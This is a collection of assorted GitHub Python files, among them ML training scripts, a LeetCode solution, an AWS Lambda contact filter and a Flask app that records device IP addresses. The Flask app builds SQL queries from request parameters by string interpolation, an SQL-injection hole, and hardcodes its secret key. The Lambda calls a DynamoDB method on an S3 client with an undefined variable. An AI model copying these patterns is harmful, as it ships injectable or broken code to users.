{title} ===> {genres}\"\n\n return ret\n\n def get_movie_list_str(self, indexes=None):\n l = []\n\n for i in indexes:\n l.append(self.get_movie(i))\n\n return \"\\n\".join(l)\n\n def split_train_test(self, test_size=0.2):\n train_matrix = self.matrix.copy()\n nz = train_matrix.nonzero()\n nz = list(zip(*[x.tolist() for x in nz]))\n test = random.sample(nz, round(len(nz) * test_size))\n test = tuple(np.array(x) for x in zip(*test))\n test_matrix = sparse.csr_matrix(train_matrix.shape)\n test_matrix[test] = 1\n train_matrix[test] = 0\n\n train = copy.deepcopy(self)\n train.matrix = train_matrix\n\n test = copy.deepcopy(self)\n test.matrix = test_matrix\n\n return train, test\n\n\n\nif __name__ == \"__main__\":\n ds = MovieLensDataset(ratings_file=\"movielens/ml-100k/ratings.csv\", movies_file=\"movielens/ml-100k/movies.csv\")\n print(ds[0][0])\n","repo_name":"yoru22413/gan-recommander","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41249778793","text":"#\n# 708. Insert into a Sorted Circular Linked List\n#\n# Q: https://leetcode.com/problems/insert-into-a-sorted-circular-linked-list/\n# A: https://leetcode.com/problems/insert-into-a-sorted-circular-linked-list/discuss/859467/Javascript-Python3-C%2B%2B-Simple-solutions\n#\n\nclass Node:\n def __init__(self, val = None, next = None):\n self.val = val\n self.next = next\n\nclass Solution:\n def insert(self, head: 'Node', x: int) -> 'Node':\n alt = Node(x); alt.next = alt\n if not head:\n return alt\n big = head\n pre = head\n cur = head.next\n ok = lambda x: pre.val <= x <= cur.val\n while not ok(x) and cur != head:\n if big.val <= cur.val:\n big = cur\n pre = pre.next\n cur = cur.next\n if not ok(x):\n pre = big\n cur = big.next\n alt.next = cur\n pre.next = alt\n return head\n","repo_name":"claytonjwong/leetcode-py","sub_path":"708_insert_sorted_circular_linked_list.py","file_name":"708_insert_sorted_circular_linked_list.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72727724890","text":"import numpy as np\nfrom scipy.constants import c, h, k, e\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import UnivariateSpline\n\n\ndebug = True # do stuff that is useful\n#bounds = [900, 1080] # domain of first pulse\n#dx = 0.0762 # separation of measurement locations\n#res = 1000 # resolution of interpolation\n#smooth = 0.0001 # degree of smoothing\n\n\n#-----------------------------------------------------------------------------\n\nif debug:\n import matplotlib.pyplot as plt\n\n# Directory structure and transition indices\ndirectories = [\"1.0 Torr\", \"4.0 Torr\", \"8.0 Torr (D)\", \"8.0 Torr (M)\",\n \"8.0 Torr (U)\"]\ntransitions = [11, 18, 23, 29, 16, 20, 26, 19, 24]\n\nfor d in directories:\n # load simulation data\n prefix = \"\".join((d[0], \"torr\"))\n try:\n emissions = np.loadtxt(\"/\".join((d, prefix)) + \"_emissions.csv\",\n delimiter=\",\")\n except IOError:\n continue\n times = np.loadtxt(\"/\".join((d, prefix)) + \"_times.csv\", delimiter=\",\")\n \n # initialize arrays\n n = len(times)\n spectra = np.zeros((n, len(transitions)))\n temperatures = np.zeros(n)\n variance = np.zeros(n)\n\n # eliminate unnecessary data\n for i in range(len(transitions)):\n spectra[:, i] = emissions[:, transitions[i]]\n\n wavelengths = 
np.loadtxt(\"/\".join((d, prefix)) + \"_wavelengths.csv\",\n delimiter=\",\")\n wavelengths = np.array([wavelengths[i] for i in transitions]) * 1e9\n header = [str(int(i)) for i in wavelengths]\n\n with open(\"/\".join((d, \"spectra.csv\")), mode=\"w\") as f:\n f.write(\",\".join(header) + \"\\n\")\n np.savetxt(f, spectra, delimiter=\",\")\n","repo_name":"l3enny/dissertation","sub_path":"simulations/Global/No Trapping/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"21084874362","text":"import json\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom datetime import date\nfrom datetime import datetime\n\nbucket = 'pinpoint-contact-list'\nkey = 'contact_list.json'\ndynamoTable = 'pinpoint_info'\n\nclient = boto3.client('s3')\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table(dynamoTable)\n\ndef verifydate(user, userDb, actfecha,now):\n \n print(userDb)\n flag = False #Flag for validations\n listsize = len(userDb['sent']) - 1\n counter = userDb['counter']\n dateLS = datetime.strptime(userDb['sent'][listsize]['date'], '%d/%m/%y %H:%M') \n diffdays = now - dateLS #Diff Between last email sent and today \n if counter < 4:\n if actfecha < dateLS and diffdays.days >= 2 :\n flag = True\n if actfecha > dateLS:\n diffdays1 = now - actfecha\n if diffdays1.days >= 2:\n updete_db = client.update_item(\n TableName = dynamoTable,\n Key = {\n 'email': {\n 'S': email\n }\n },\n UpdateExpression=\"SET #counter = :vals\",\n ExpressionAttributeNames={\"#counter\": \"counter\"},\n ExpressionAttributeValues={\":vals\": { \"N\" : \"0\" }})\n flag = True\n #Resetear contador o hacer lo que se vaya a hacer\n return flag\n \n \n\ndef lambda_handler(event, context):\n # Variables para llenar\n finalList = []\n listofemail=[]\n \n #Cliente boto3\n \n \n #Fecha de hoy\n now = datetime.now()\n today = now.strftime(\"%d/%m/%y %H:%H\")\n \n #tabla Dynamo\n \n \n # Get Object S3\n result = client.get_object(Bucket=bucket, Key=key)\n text = result[\"Body\"].read().decode()\n jsonlist = json.loads(text)\n listofusers= jsonlist['listofusers'] # Cambiar a este para dejar de probar con el event\n #listofusers = event['listofusers']\n \n \n \n resp = table.scan()\n listofuserDynamoDb = resp['Items']\n \n \n for user in listofuserDynamoDb:\n listofemail.append(user['email'])\n \n \n print('--------------------event users--------------------------------')\n print(listofusers)\n print('--------------------------Dynamo Users-------------------------')\n print(listofuserDynamoDb)\n print(\"-------------------------final users-----------------------------------------------\")\n \n \n\n for user in listofusers:\n actfecha = datetime.strptime(user['Attributes.LastActionTime'], '%d/%m/%y %H:%M')\n diff = now - actfecha\n if not user['Address'] in listofemail:\n if diff.days >= 7:\n finalList.append(user)\n else:\n for userDb in listofuserDynamoDb:\n if userDb['email'] == user['Address']:\n if verifydate(user,userDb,actfecha,now):\n finalList.append(user)\n break\n \n \n for usuario in finalList:\n if usuario['Attributes.Name'] == \" \":\n usuario['Attributes.Name'] = \"USUARIO\"\n \n fLOU = {\n 'listofusers': finalList\n }\n with open('/tmp/sample.txt', 'w') as f:\n json.dump(fLOU, f)\n s3_client = boto3.client('s3')\n response = s3_client.upload_file('/tmp/sample.txt', 'pinpoint-contact-list', 'filtered_contact_list.json')\n \n return {\n 'statusCode': 200,\n 
}\n","repo_name":"vicmusa/Scripts","sub_path":"awspinpoint/Get_Dynamo_Pimpoint.py","file_name":"Get_Dynamo_Pimpoint.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1328104799","text":"n=int(input(\"Enter: \"))\nfibonacci =[0]*30\nfibonacci[1] = fibonacci[2] = 1;\n\ndef fib(n):\n if(n==1 or n==2):\n return 1\n elif(fibonacci[n]!=0):\n return fibonacci[n]\n else:\n fibonacci[n] = fib(n-1)+fib(n-2)\n return fibonacci[n]\n\n\n\nif(n<0):\n print('Invalid Input')\nelse:\n print(fib(n))\n print(fibonacci)","repo_name":"vipray/pythonKePakode","sub_path":"BasicsOfPython/6.3fibonacii.py","file_name":"6.3fibonacii.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5974517494","text":"\"\"\"This package includes all the modules related to data loading and preprocessing\n To add a custom dataset class called 'dummy', you need to add a file called 'dummy_dataset.py' and define a subclass 'DummyDataset' inherited from BaseDataset.\n You need to implement four functions:\n -- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).\n -- <__len__>: return the size of dataset.\n -- <__getitem__>: get a data point from data loader.\n -- : (optionally) add dataset-specific options and set default options.\nNow you can use the dataset class by specifying flag '--dataset_mode dummy'.\nSee our template dataset class 'template_dataset.py' for more details.\n\"\"\"\nimport importlib\nfrom games.base_game import BaseGame\n\n\ndef find_game_using_name(game_name):\n \"\"\"Import the module \"games/[game_name]_game.py\".\n In the file, the class called [GameName]Game() will\n be instantiated. 
It has to be a subclass of BaseGame,\n and it is case-insensitive.\n \"\"\"\n game_filename = \"games.\" + game_name + \"_game\"\n gamelib = importlib.import_module(game_filename)\n\n game = None\n target_game_name = game_name.replace('_', '') + 'game'\n for name, cls in gamelib.__dict__.items():\n if name.lower() == target_game_name.lower() \\\n and issubclass(cls, BaseGame):\n game = cls\n\n if game is None:\n raise NotImplementedError(\"In %s.py, there should be a subclass of BaseGAME with class name that matches %s in lowercase.\" % (game_filename, target_game_name))\n\n return game\n\n\ndef get_option_setter(game_name):\n \"\"\"Return the static method of the dataset class.\"\"\"\n game_class = find_game_using_name(game_name)\n return game_class.modify_commandline_options\n\n\ndef create_game(opt):\n \"\"\"Create a game given the option.\n This is the main interface between this package and 'train.py'/'test.py'\n Example:\n >>> from games import create_game\n >>> game = create_game(opt)\n \"\"\"\n game = find_game_using_name(opt.game)\n instance = game(opt)\n print(\"game of [%s] was set\" % type(instance).__name__)\n return instance\n\n","repo_name":"jimmy-academia/AlphaZero-Pytorch-Go-Mahjong","sub_path":"games/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"15120501361","text":"from __future__ import division\nfrom pathlib import Path\nimport time\n\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten\nfrom keras.models import model_from_json #to load a model from a json file.\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy.misc import toimage\n# from sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\nnp.random.seed(12345678)\n\n\n\n#NN architecture\nn_hlayers = 5\nn_neurons = 401\ninitial_neurons = 128\nneurons = 200\n# layers = 10\nneurons_step = 20\nn_epochs= 20\nn_batch_size= 128\ndropout_list = [0.0, 0.2, 0.4, 0.6]\ndropout = 0.\nkernel_initializer_list = ['random_normal', 'glorot_normal', 'he_normal']\nkernel_initializer = 'glorot_normal'\n\n#global variables\nplots_folder = Path(\"plots/fine_tune_cnn\")\nmodels_folder = Path(\"models/\")\ndataset_name = \"cifar\"\noriginal_model_name = 'cnn_{}'.format(dataset_name)\nimgs_folder = Path(\"imgs/\")\ncifar_fnn_total_history = []\ntext_file = \"CIFAR-CNN score file.txt\"\n\nlayers_accuracy = []\nneurons_accuracy = []\nkernel_accuracy = []\noptimizer_accuracy = []\n\nif __name__==\"__main__\":\n start_time = time.clock()\n print(\"Using keras version {0}\".format(keras.__version__))\n\n # Load the MNIST dataset\n (x_train, y_train), (x_test, y_test) = cifar10.load_data() # loading of MNIST dataset\n\n # check sizes\n print(\"\\n\")\n print(\"Number of training examples: '{0}'\".format(x_train.shape[0]))\n print(\"Number of test examples: '{0}'\".format(x_test.shape[0]))\n print(\"Size of train samples: '{0}'\".format(x_train.shape[1:]))\n\n # Data to 1D and normalization\n #x_train = x_train.reshape(60000, 784) # 60000 observations of 784 features\n #x_test = x_test.reshape(10000, 784) # 10000 observations of 784 features\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train = x_train / 255\n x_test = x_test / 255\n\n train_input_shape = 
x_train.reshape(*x_train.shape)\n test_input_shape = x_test.reshape(*x_test.shape)\n\n # Adapts labels to one hot encoding vector for softmax classifier\n y_train = np_utils.to_categorical(y_train, 10)\n y_test = np_utils.to_categorical(y_test, 10)\n\n # Neural network architecture\n # CNN\n nn = Sequential()\n nn.add(Conv2D(32, kernel_size=(3,3),kernel_initializer=kernel_initializer, activation = 'relu', input_shape=x_train.shape[1:]))\n nn.add(MaxPooling2D(pool_size=(2,2)))\n nn.add(Conv2D(64,(3,3),kernel_initializer=kernel_initializer, activation = 'relu'))\n nn.add(MaxPooling2D(pool_size=(2,2)))\n nn.add(Flatten())\n nn.add(Dense(128,kernel_initializer=kernel_initializer, activation='relu'))\n nn.add(Dense(10,kernel_initializer=kernel_initializer, activation='softmax'))\n\n # Model visualization\n # The plot of the model needs pydot, graphviz and pydot-ng\n #plot_model(nn, to_file='nn.png', show_shapes=True)\n\n # Compile the model\n for (optimizer, optimizer_name) in zip([keras.optimizers.SGD(),\n keras.optimizers.Adam(),\n keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.995, epsilon=1e-08, decay=0.0005),\n keras.optimizers.Adam(amsgrad= True),\n keras.optimizers.Adagrad(),\n keras.optimizers.Nadam(),\n keras.optimizers.RMSprop(),\n keras.optimizers.Adamax()],\n [\"SGD\",\"Adam_Default\", \"Adam_custom\", \"Adam_amsgrad\", \"Adagrad\",\n \"Nadam\", \"RMSprop\", \"Adamax\"]):\n\n nn.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n model_name = original_model_name\n model_name = model_name + optimizer_name\n\n history = nn.fit(x_train, y_train, validation_data=(x_test, y_test), batch_size=n_batch_size, epochs=n_epochs)\n\n # Evaluate the model\n score = nn.evaluate(x_test, y_test, verbose=0)\n\n # Store plots\n # Accuracy plot\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plot_name = plots_folder /'model_accuracy_{0}'.format(model_name)\n plt.savefig(str(plot_name))\n plt.close()\n # Loss plot\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plot_name = plots_folder / 'model_loss_{0}'.format(model_name)\n plt.savefig(str(plot_name))\n plt.close()\n\n # Confusion Matrix\n # Compute probabilities\n # Y_pred = nn.predict(x_test)\n # # Assign most probable label\n # y_pred = np.argmax(Y_pred, axis=1)\n # # Plot statistics\n # print('Analysis of results')\n # target_names = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n # print(classification_report(np.argmax(y_test, axis=1), y_pred, target_names=target_names))\n # print(confusion_matrix(np.argmax(y_test, axis=1), y_pred))\n #\n # # Saving model and weights\n # nn_json = nn.to_json()\n # json_file_name = '{0}.json'.format(model_name)\n # with open(models_folder / json_file_name, 'w') as json_file:\n # json_file.write(nn_json)\n # weights_file_name = \"weights-{0}_\".format(model_name) + str(score[1]) + \".hdf5\"\n # weights_file = models_folder / weights_file_name\n # nn.save_weights(str(weights_file), overwrite=True)\n #\n # # Loading model and weights\n # json_file = open(models_folder / json_file_name, 'r')\n # nn_json = json_file.read()\n # json_file.close()\n # nn = model_from_json(nn_json)\n # nn.load_weights(weights_file)\n\n #measuring execution time\n print(\"Total execution time {} 
seconds\".format(time.clock() - start_time))","repo_name":"Afrojam/deep_learning","sub_path":"class_01_mlp_and_cnn/CIFAR10_cnn.py","file_name":"CIFAR10_cnn.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36442810568","text":"import numpy as np\nfrom sympy import *\nfrom sympy.parsing.sympy_parser import parse_expr\nimport math\n\nclass InterpolacionLagrange:\n\n def __init__(self, n, x, y):\n\n self.n = n\n self.x = x\n self.y = y\n self.proceso = []\n def lagrange(self):\n self.n = int(self.n)\n polinomio = \"\"\n F = Function('F')\n G = Function('G')\n print(\"\\n----------------------------FORMA ESQUEMATICA POLINOMIO DE LAGRANGE---------------------------\\n\\n----------------- P(X) = L0(X)F(X0) + L1(X)F(X1) + L2(X)F(X2) + ... + LN(X)F(XN)---------------\")\n for i in range(self.n):\n L = \"(\"\n for j in range(self.n):\n if (j != i):\n L += \"(x - \" + str(self.x[j]) + \")\"\n L += \")\"\n L += \" / (\"\n for j in range(self.n):\n if (j != i):\n L += \"(\" + str(self.x[i]) + \" - \" + str(self.x[j]) + \")\"\n\n L += \")\"\n L = L.replace(\")(\",\")*(\")\n F = parse_expr(L)\n self.proceso.append(\"\\n L\" + str(i) + \"(x) = \" + L.replace(\"((\",\"(\").replace(\"))\",\")\") + \" = \" + str(expand(F)))\n if i == self.n-1:\n polinomio += \"(\" + str(expand(F)) + \")*\" + str(self.y[i])\n else:\n polinomio += \"(\" + str(expand(F)) + \")*\" + str(self.y[i]) + \" + \"\n\n G = (\"P(x) =\" + str(expand(polinomio)))\n print(\"\\n-----------------------------------POLINOMIO INTERPOLANTE DE LAGRANGE --------------------------------\\n \\n\" + \"P(X) = \" + str(G))\n return G\n\n \n\n\n","repo_name":"jlondo97/Proyecto_numerico","sub_path":"app/src/metodos/Interpolacion/interpolacionLagrange.py","file_name":"interpolacionLagrange.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8374357961","text":"# -*- mode: python ; coding: utf-8 -*-\n# !!! 
create virtualenv to disable TQDM unused module\n\nblock_cipher = None\n\napp_name = 'mdict'\npkg_path = 'mdict_utils'\n\nscript_path = os.path.join(workpath, f'{app_name}-script.py')\n\nwith open(script_path, 'wt') as f:\n f.write(f'import {pkg_path}.__main__\\n{pkg_path}.__main__.run()')\n\na = Analysis([script_path],\n pathex=['.'],\n binaries=[],\n datas=[],\n hiddenimports=['pkg_resources.py2_warn'],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\n\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n\nif False: # one folder\n exe = EXE(pyz,\n a.scripts,\n [],\n exclude_binaries=True,\n name=app_name,\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n console=True )\n coll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n upx_exclude=[],\n name=app_name)\nelse: # onefile\n exe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name=app_name,\n debug=False,\n strip=False,\n upx=True,\n runtime_tmpdir=None,\n console=True )\n","repo_name":"dlxj/doc","sub_path":"lang/programming/python/mdict-utils/mdict_utils.spec","file_name":"mdict_utils.spec","file_ext":"spec","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"39402378158","text":"from django.urls import path\n\nfrom myapp.views import active_report\nfrom . import views\n\napp_name = 'myapp'\nurlpatterns = [\n path('leaverequest/', views.LeaveRequestCreate.as_view(), name='leaverequest'),\n path('', views.Home.as_view(), name='home'),\n path('leave-list', views.LeaveList.as_view(), name='leave-list'),\n path('profile//', views.Profile.as_view(), name='profile'),\n path('wfh_create/', views.WorkFromHomeCreate.as_view(), name='wfh_create'),\n path('annual_leave/', views.AnnualLeaveList.as_view(), name='annual_leave'),\n path('leave_create/', active_report, name='active_leave'),\n path('home/', views.HomeForUser.as_view(), name='home2'),\n]\n","repo_name":"SivakumarSkr/LeaveRegister","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42472851755","text":"from flask import Flask, request, jsonify\nimport os, multiprocessing, string, random, time, argparse, json\nimport logging as logger\nimport sqlite3\n\nRUN_IN_DEBUG_MODE = os.environ.get('RUN_IN_DEBUG_MODE', False)\nPORT = os.environ.get(\"PORT\", 8000)\nLOG_DIR = os.environ.get(\"LOG_DIR\", \"./logs\")\n\nif not os.path.isdir(\"./logs\"):\n logger.info(f\"Creating {LOG_DIR} dir\")\n os.mkdir(\"./logs\")\n\nlogger.basicConfig(level=\"INFO\")\n\n\napp=Flask(__name__)\n\napp.secret_key=\"veryV#3rySc67eTkey\"\n\nglobal taskQueue\n\ndef getDBConnector():\n return sqlite3.connect('ipAddresses.db')\n\ndef intIPDatabase():\n DB_CONNECTION = getDBConnector()\n\n try:\n logger.info(\"DB Connection opened successfully.\")\n except Exception as e:\n logger.info(\"Error in opening DB Connection.\")\n logger.error(e)\n\n\n try: \n DB_CONNECTION.execute('''\n CREATE TABLE IF NOT EXISTS ip_address(\n ID INT PRIMARY KEY NOT NULL,\n DEVICE_NAME TEXT NOT NULL UNIQUE,\n DEVICE_IP TEXT NOT NULL\n );\n ''')\n logger.info(\"Ran create table query successfully\")\n except Exception as e:\n logger.info(\"Error in running create table query successfully\")\n logger.error(e)\n\n 
DB_CONNECTION.close()\n\ndef addIPToTable(IP, device_name):\n status = False\n conn = getDBConnector()\n\n try:\n conn.execute(f\"INSERT INTO ip_address (ID,DEVICE_NAME,DEVICE_IP) VALUES ('{getUid()}', '{device_name}', '{IP}');\")\n conn.commit()\n logger.info(\"Records created successfully\")\n status = True\n except Exception as e:\n logger.info(\"Adding record failed.\")\n logger.error(e)\n\n conn.close()\n return status\n\ndef updateIPAddress(IP, device_name):\n status = False\n conn = getDBConnector()\n\n try:\n conn.execute(f\"UPDATE ip_address set DEVICE_IP = '{IP}' where DEVICE_NAME = '{device_name}'\")\n conn.commit()\n logger.info(\"Records created successfully\")\n status = True\n except Exception as e:\n logger.info(\"Adding record failed.\")\n logger.error(e)\n\n conn.close()\n return status\n\ndef getIPdata():\n conn = getDBConnector()\n cursor = None\n out = {}\n\n try:\n cursor = conn.execute(\"SELECT ID, DEVICE_NAME, DEVICE_IP from ip_address\")\n except Exception as e:\n logger.info(\"Fetching records failed.\")\n logger.error(e)\n return \"Error in fetching data from database.\"\n\n for row in cursor:\n out[\"id\"] = row[0]\n out[\"device_id\"] = row[1]\n out[\"device_ip\"] = row[2]\n\n conn.close()\n\n return out\n\n\ndef getUid(noOfCharecters=6):\n chars = string.ascii_letters + string.digits\n uid = ''.join(random.choice(chars) for n in range(noOfCharecters))\n return uid\n\ndef isValid(IP):\n def isIPv4(s):\n try: return str(int(s)) == s and 0 <= int(s) <= 255\n except: return False\n \n def isIPv6(s):\n if len(s) > 4:\n return False\n try : return int(s, 16) >= 0 and s[0] != '-'\n except:\n return False\n\n if IP.count(\".\") == 3 and all(isIPv4(i) for i in IP.split(\".\")):\n return True\n\n if IP.count(\":\") == 7 and all(isIPv6(i) for i in IP.split(\":\")):\n return True\n return False\n\n@app.route('/', methods = ['GET'])\ndef stats():\n return jsonify(getIPdata())\n\n@app.route('/health', methods = ['GET'])\ndef health():\n return \"ok\"\n\n@app.route('/myipis', methods = ['GET'])\ndef addmyip():\n IP = None\n if \"ip\" not in request.args:\n return \"IP address not given\", 422\n \n if \"device_id\" not in request.args:\n return \"device name not given\", 422\n\n IP = request.args.get(\"ip\")\n device_id = request.args.get(\"device_id\")\n\n\n if isValid(IP):\n if addIPToTable(IP, device_id):\n return \"IP address Saved.\"\n else:\n return \"Failed\", 500\n else:\n return \"Invalid IP.\", 422\n\n@app.route('/myipis', methods = ['PATCH'])\ndef updatemyip():\n IP = None\n if \"ip\" not in request.args:\n return \"IP address not given\", 422\n\n if \"device_id\" not in request.args:\n return \"device name not given\", 422\n\n IP = request.args.get(\"ip\")\n device_id = request.args.get(\"device_id\")\n\n if isValid(IP):\n if updateIPAddress(IP, device_id):\n return \"IP address Updated.\"\n else:\n return \"Failed\", 500\n\n else:\n return \"Invalid IP.\", 422\n\ndef queueMonitor():\n\n while True:\n if not taskQueue.empty():\n print(\"Found a task.\")\n try:\n task = taskQueue.get()\n except Exception as e:\n pass\n else:\n time.sleep(0.1)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--PORT', help = \"port to run\", default = PORT)\n args = parser.parse_args()\n\n manager = multiprocessing.Manager()\n taskQueue = manager.Queue()\n\n queueMonitor = multiprocessing.Process(name = \"queueMonitor\", target = queueMonitor)\n\n print(\"Starting queue monitor.\")\n # 
queueMonitor.start()\n\n intIPDatabase()\n app.run(debug=True, host='0.0.0.0', port=args.PORT)\n \n","repo_name":"SREENATHPGS/autocloud","sub_path":"ipCollector/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16220652178","text":"\"\"\"GRNN implementation for fine-grained emotion classification.\"\"\"\n\"\"\"We use various other data instead of twitter data annotated and used in the\npaper. Furthermore, Ekman's emotion set is used instead of emotion categories\n defined by Plutchik.\"\"\"\n\nimport sys\nimport os\nimport time\nimport json\nimport pickle\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom torch import optim\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom preprocess import *\nfrom utils import *\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\nclass GRNN(nn.Module):\n def __init__(self, input_size, embedding_size, mini_batch_size, hidden_size,\n label_size, MAX_LENGTH, n_layer=1, CUDA_use=False):\n super(GRNN, self).__init__()\n self.input_size = input_size\n self.embedding_size = embedding_size\n self.mini_batch_size = mini_batch_size\n self.hidden_size = hidden_size\n self.label_size = label_size\n self.MAX_LENGTH = MAX_LENGTH\n self.n_layer = n_layer\n self.CUDA_use = CUDA_use\n\n self.embedding = nn.Embedding(input_size, embedding_size)\n self.gru = nn.GRU(embedding_size, hidden_size, n_layer, dropout=0.1)\n self.out = nn.Linear(hidden_size, label_size)\n #self.softmax = nn.LogSoftmax()\n\n def forward(self, batch_word_seq, hidden):\n # batch_word_seq is a variable\n batch_size = batch_word_seq.size()[0]\n seq_len = batch_word_seq.size()[1]\n embedded = self.embedding(batch_word_seq).view(seq_len, batch_size, -1)\n output, hidden = self.gru(embedded, hidden)\n #seq_len, batch, hidden_size -> batch, hidden_size\n # use last output\n output = output[-1].view(batch_size, -1)\n output = self.out(output)\n #batch, label_size\n return output\n\n def init_hidden(self, mini_batch_size):\n if self.CUDA_use:\n hidden = Variable(torch.zeros(self.n_layer, mini_batch_size,\n self.hidden_size)).cuda()\n else:\n hidden = Variable(torch.zeros(self.n_layer, mini_batch_size,\n self.hidden_size))\n return hidden\n\ndef train(grnn, grnn_optimizer, criterion, input_variables, labels):\n #input_variables = batch(1) * seq_len\n batch_size = input_variables.size()[0]\n grnn_init_hidden = grnn.init_hidden(batch_size)\n grnn_optimizer.zero_grad()\n output = grnn(input_variables, grnn_init_hidden)\n # output shape = batch, label_size\n loss = criterion(output, labels)\n loss.backward()\n grnn_optimizer.step()\n return loss.data[0]/(batch_size*1.)\n\ndef test(grnn, test_variables, test_labels):\n grnn.train(False)\n batch_size = test_variables.size()[0] #1\n grnn_init_hidden = grnn.init_hidden(batch_size)\n output = grnn(test_variables, grnn_init_hidden)\n softmax = nn.LogSoftmax()\n output = softmax(output)\n acc = 0\n for oi in range(batch_size):\n topv, topi = output[oi].data.topk(1)\n predicted = topi[0]\n if predicted == test_labels.data[0]:\n acc += 1\n return acc / batch_size*1., predicted\n\ndef confusionMatrix(y_pred, y_true, fname):\n mat = confusion_matrix(y_true, y_pred)\n precision, recall, fscore, _ = \\\n precision_recall_fscore_support(y_true, y_pred)\n with open(fname, 'w') as f:\n for row in mat:\n for num in row:\n 
f.write(str(num) + '\\t')\n f.write('\\n')\n f.write('\\n')\n for idx, item in enumerate(precision):\n f.write(str(item)+'\\t'+str(recall[idx])+'\\t'+str(fscore[idx])+'\\n')\n\nif __name__ == \"__main__\":\n CUDA_use = True\n UNK_token = 0\n n_epoch = 14\n n_iter = 100\n n_layer = 3\n embedding_size = 300\n hidden_size = 1000\n mini_batch_size = 1\n learning_rate = 0.0001\n MAX_LENGTH = 30\n data_name = 'bopang'\n blogs_data = '/Users/jaeickbae/Documents/projects/2017 Affective Computing\\\n/Emotion-Data/Benchmark/category_gold_std.txt'\n bopang_data = '/Users/jaeickbae/Documents/projects/data/bopang_twitter/rt-polaritydata'\n\n # get data\n train_input_var, train_output_label, test_input_var,\\\n test_output_label, test_sentence, train_input = \\\n prepareData(data_name , bopang_data, CUDA_use, MAX_LENGTH)\n\n train_output_label = Variable(torch.LongTensor(train_output_label))\n test_output_label = Variable(torch.LongTensor(test_output_label))\n if CUDA_use:\n train_output_label = train_output_label.cuda()\n test_output_label = test_output_label.cuda()\n\n label_size = len(train_input.tag2idx)\n # define model, criterion, and optimizer\n grnn = GRNN(train_input.n_words, embedding_size, mini_batch_size,\\\n hidden_size, label_size, MAX_LENGTH, n_layer, CUDA_use)\n if CUDA_use:\n grnn = grnn.cuda()\n criterion = nn.CrossEntropyLoss()\n grnn_optimizer = torch.optim.Adam(grnn.parameters(), lr=learning_rate)\n\n # train\n print(\"Training...\")\n start = time.time()\n plot_losses = []\n plot_loss_total = 0\n print_loss_total = 0\n print_every = 1000\n plot_every = 100\n n_iter = 0\n for epoch in range(n_epoch):\n for i, sentences in enumerate(train_input_var):\n n_iter += 1\n loss = train(grnn, grnn_optimizer, criterion, sentences,\\\n train_output_label[i])\n print_loss_total += loss\n plot_loss_total += loss\n\n if (n_iter) % print_every == 0:\n print_loss_avg = print_loss_total / (print_every*1.)\n print_loss_total = 0\n print('%s (%d %d%%) %.4f' % ((timeSince(start, n_iter/\n (len(train_input_var)*n_epoch*1.))), n_iter,\n 